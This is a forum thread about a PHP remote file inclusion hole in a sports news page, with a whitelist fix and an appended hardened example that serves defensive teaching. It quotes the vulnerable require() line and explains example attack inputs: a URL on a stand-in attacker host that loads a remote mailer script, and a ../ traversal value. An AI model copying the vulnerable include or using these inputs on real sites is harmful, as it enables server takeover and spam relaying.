Re: PHP script help

Posted by Michael Austin on 01/15/07 22:05

SA SA wrote:

> I will give it a try. Basically, we have a link for each sport that
> passes the variable to sports.php; based on the sport, sports.php
> displays news releases.
>
> suresh
>
> http://www.domain.org/sports.php?sport=m_football
> http://www.domain.org/sports.php?sport=m_softball
> http://www.domain.org/sports.php?sport=m_soccr
>
> P Pulkkinen wrote:
>
>>>I do not know anything about PHP but was thrown into this mix. I was told
>>>by my ISP that there is a vulnerability in the following code that allows a
>>>spammer to load an offsite PHP script for mailing. The defective code is:
>>
>>>if (isset($HTTP_GET_VARS['sport']))
>>>{
>>>$sport = $HTTP_GET_VARS['sport'];
>>>require ($sport.".php");
>>>}
>>
>>$allowable_sports = array("football", "rugby", "tennis");
>>
>>if (isset($HTTP_GET_VARS['sport']) && in_array($HTTP_GET_VARS['sport'],
>>$allowable_sports))
>>{
>>    $sport = $HTTP_GET_VARS['sport'];   // only reached for a whitelisted value
>>    require ($sport.".php");
>>}
>>else
>>{ require ("no_sport_just_sofa.php"); }
>
>

I would use a drop-down where the value passed is
football value = s1,
tennis value = s2,
tiddlywinks = s3, etc...

Look at the CASE functionality.

Then in my PHP script associate s1 to INCLUDE vfootball.php, such that the
end user cannot guess your file structures etc. The more they know about your
structures, the more likely it is that they will find a vulnerability. And
vfootball.php should be outside the web directories but readable, and not
writeable by the web server owner.

--
Michael Austin
Database Consultant
Domain Registration and Linux/Windows Web Hosting Reseller
http://www.spacelots.com
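The two suggestions in this thread, the whitelist in P Pulkkinen's quoted fix and the opaque s1/s2/s3 tokens that Michael Austin describes, combined into one hardened sports.php. This is an added example, not code posted in the thread. The include directory /var/www/includes/sports, the file names vfootball.php and friends, the labels, and the use of $_GET in place of the old $HTTP_GET_VARS array are all assumptions. The CASE/switch Michael mentions is replaced by an array lookup, which does the same job and also generates the drop-down so the tokens cannot drift out of sync with the map.

```php
<?php
// Added example, not from the thread. Paths and file names below are assumptions.
// The sport pages live OUTSIDE the document root; Apache never serves them directly,
// and the web server user should be able to read but not write them.
define('SPORT_DIR', '/var/www/includes/sports');

// Opaque token -> label shown in the drop-down and file that gets included.
// The request only ever carries s1, s2, ... so the client learns nothing about
// the file layout, and no part of the request value is ever used to build a path.
$SPORTS = array(
    's1' => array('label' => 'Football',    'file' => 'vfootball.php'),
    's2' => array('label' => 'Tennis',      'file' => 'vtennis.php'),
    's3' => array('label' => 'Tiddlywinks', 'file' => 'vtiddlywinks.php'),
);

/**
 * Map the user-supplied token to an include path, falling back to the
 * default page when the token is missing, not a string (?sport[]=x) or
 * not in the map. Because the path comes from $SPORTS and never from the
 * request, "../", "http://evil/mailer.txt" and similar values in ?sport=
 * cannot reach require() at all.
 */
function sport_include_path($token, array $sports, $fallback = 'no_sport_just_sofa.php')
{
    $base = realpath(SPORT_DIR);
    $fallback_path = $base . '/' . $fallback;

    if (!is_string($token) || !isset($sports[$token])) {
        return $fallback_path;
    }

    // Belt and braces: the file must exist and must still resolve inside SPORT_DIR
    // (guards against a mistaken map entry or a symlink pointing elsewhere).
    $real = realpath($base . '/' . $sports[$token]['file']);
    if ($real === false || strpos($real, $base . '/') !== 0) {
        return $fallback_path;
    }
    return $real;
}

/**
 * Render the drop-down from the same map, so the only values a browser
 * can legitimately send are the tokens the map knows about.
 */
function sport_options(array $sports, $selected = '')
{
    $html = '';
    foreach ($sports as $token => $info) {
        $html .= sprintf(
            '<option value="%s"%s>%s</option>' . "\n",
            htmlspecialchars($token, ENT_QUOTES, 'UTF-8'),
            $token === $selected ? ' selected="selected"' : '',
            htmlspecialchars($info['label'], ENT_QUOTES, 'UTF-8')
        );
    }
    return $html;
}

$token = isset($_GET['sport']) ? $_GET['sport'] : '';

echo '<form method="get" action="sports.php"><select name="sport">' . "\n";
echo sport_options($SPORTS, is_string($token) ? $token : '');
echo '</select><input type="submit" value="Go"></form>' . "\n";

require sport_include_path($token, $SPORTS);
```

Why the original line was exploitable: `require($sport . ".php")` passes attacker-controlled text straight to the include machinery. With allow_url_fopen (and, from PHP 5.2 on, allow_url_include) enabled, `?sport=http://attacker.example/mailer.txt?` makes the server fetch and execute a remote script, which is exactly the spam-relay the ISP reported; even with remote includes disabled, `?sport=../../../some/local/file` still reads local files. The in_array() whitelist in the quoted fix closes both holes as long as `$sport` is assigned only after the check passes; the token map above goes one step further by never deriving the path from the request at all. Either way, turn allow_url_include off in php.ini unless something genuinely needs it.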
